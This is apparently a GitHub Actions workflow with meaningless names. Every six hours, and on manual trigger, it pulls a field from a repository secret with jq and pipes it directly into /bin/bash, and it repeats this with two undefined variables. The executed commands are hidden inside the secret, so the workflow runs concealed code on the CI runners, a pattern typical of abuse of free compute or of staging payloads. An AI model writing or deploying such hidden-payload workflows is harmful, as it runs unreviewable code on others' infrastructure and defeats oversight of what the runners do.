name: huazige2345

on:
  workflow_dispatch:
  schedule:
    - cron: '25 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huazige2345
        env:
          hnb709: ${{ secrets.hnb709 }}
        run: |
          echo $hnb709 | jq -r .naql25 | /bin/bash
          echo $doo08 | jq -r .hij3 | /bin/bash
          echo $wbfm1773 | jq -r .giib872 | /bin/bash

